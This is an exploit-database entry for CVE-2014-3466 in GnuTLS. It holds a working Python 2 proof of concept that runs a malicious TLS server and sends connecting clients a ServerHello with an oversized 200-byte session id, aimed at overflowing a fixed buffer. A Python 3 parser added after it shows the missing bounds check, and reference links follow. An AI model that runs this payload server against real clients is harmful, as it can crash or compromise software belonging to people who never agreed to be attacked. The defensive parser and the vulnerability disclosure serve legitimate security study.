GNUTLS insufficient session id length check PoC

2014.06.06
Credit: Aaron Zauner
Risk: High
Local: No
Remote: Yes
CWE: CWE-119


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/env python
#
# PoC for CVE-2014-3466
# (gnutls: insufficient session id length check in _gnutls_read_server_hello)
#
# Author:  Aaron Zauner <azet@azet.org>
# License: CC BY 3.0 (https://creativecommons.org/licenses/by/3.0)
#
# Python 2 script (print statement, str.decode('hex')).
import sys
import socket
import time

# Record Layer
R_Type    = '16'     # Handshake Protocol
R_Version = '03 01'  # TLS 1.0
R_Length  = '00 fa'  # 250 Bytes

# Handshake Protocol: ServerHello
HS_Type    = '02'        # Handshake Type: ServerHello
HS_Length  = '00 00 f6'  # 246 Bytes
HS_Version = '03 01'     # TLS 1.0
HS_Random  = '''
53 8b 7f 63 c1 0e 1d 72 0a b3 f8 a7 0f f5 5d 69
65 58 42 80 c1 fb 4f db 9a aa 04 a3 d3 4b 71 c7
'''                      # Random (gmt_unix_time + random bytes)
HS_SessID_Len  = 'c8'    # Session ID Length 200 Bytes (!)
HS_SessID_Data = '''
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
ff ff ff
'''                      # Session ID Data (Payload): 211 bytes, i.e. the 200 bytes
                         # counted by the length byte plus the bytes that fill the
                         # 246-byte handshake length advertised in HS_Length

MaliciousServerHello = (
    R_Type + R_Version + R_Length +
    HS_Type + HS_Length + HS_Version + HS_Random +
    HS_SessID_Len + HS_SessID_Data
).replace(' ', '').replace('\n', '').decode('hex')


def main():
    PORT = int(sys.argv[1])
    # Create the socket outside the try block so the finally clause
    # cannot hit a NameError when argument parsing fails.
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.bind(('', PORT))
        sock.listen(1)
        print "-- started listener on port", PORT
        while True:
            conn, addr = sock.accept()
            print "<< client connected:", addr
            time.sleep(0.5)  # wait for ClientHello :P
            if conn.send(MaliciousServerHello):
                print ">> sent payload to", addr[0]
            conn.close()
    finally:
        sock.close()


if __name__ == '__main__':
    if len(sys.argv) <= 1:
        print " Usage:\n\tpython poc.py [port]\n"
        exit(1)
    main()
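The check that the vulnerable _gnutls_read_server_hello omitted, shown as an added Python 3 parser that is not part of the advisory or of gnutls: every length field in the ServerHello is bounded before it is used as an offset or copy size, and a session id longer than the 32 bytes RFC 5246 allows is rejected instead of being copied into a fixed-size buffer (CWE-119). The builder produces constructed sample records with consistent headers; the cipher suite in them is arbitrary.

```python
import struct

TLS_MAX_SESSION_ID_SIZE = 32  # RFC 5246: session_id is opaque <0..32>


class ServerHelloError(ValueError):
    """Raised for any malformed or out-of-bounds ServerHello field."""


def parse_server_hello(record):
    """Parse one TLS record carrying a ServerHello, bounding each
    length field before it is used as an offset or copy size."""
    if len(record) < 5 or record[0] != 0x16:
        raise ServerHelloError("not a handshake record")
    rec_len = struct.unpack("!H", record[3:5])[0]
    body = record[5:5 + rec_len]
    if len(body) != rec_len:
        raise ServerHelloError("record truncated")
    if len(body) < 4 or body[0] != 0x02:
        raise ServerHelloError("not a ServerHello")
    hs_len = int.from_bytes(body[1:4], "big")
    hs = body[4:4 + hs_len]
    if len(hs) != hs_len:
        raise ServerHelloError("handshake length mismatch")
    if len(hs) < 2 + 32 + 1:
        raise ServerHelloError("ServerHello too short")
    sid_len = hs[34]
    # The check missing from the vulnerable _gnutls_read_server_hello:
    # the session id must fit the fixed 32-byte buffer it is copied into.
    if sid_len > TLS_MAX_SESSION_ID_SIZE:
        raise ServerHelloError("session id length %d exceeds %d"
                               % (sid_len, TLS_MAX_SESSION_ID_SIZE))
    end = 35 + sid_len
    if len(hs) < end + 3:  # cipher_suite (2) + compression_method (1)
        raise ServerHelloError("session id or cipher suite truncated")
    return {"version": (hs[0], hs[1]), "random": hs[2:34],
            "session_id": hs[35:end], "cipher_suite": hs[end:end + 2],
            "compression": hs[end + 2]}


def build_server_hello(session_id, random=b"\x00" * 32):
    """Constructed sample (not captured traffic): wrap a ServerHello with
    the given session id in consistent handshake and record headers."""
    hs = (b"\x03\x01" + random + bytes([len(session_id)]) + session_id
          + b"\x00\x2f\x00")  # arbitrary cipher suite, null compression
    body = b"\x02" + len(hs).to_bytes(3, "big") + hs
    return b"\x16\x03\x01" + struct.pack("!H", len(body)) + body
```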

References:

http://www.gnutls.org/security.html
http://www.tripwire.com/state-of-security/top-security-stories/gnutls-crypto-library-vulnerability-cve-2014-3466/
https://security.stackexchange.com/questions/59407/gnutls-serverhello-exploit-cve-2014-3466-how-to-verify



Copyright 2024, cxsecurity.com
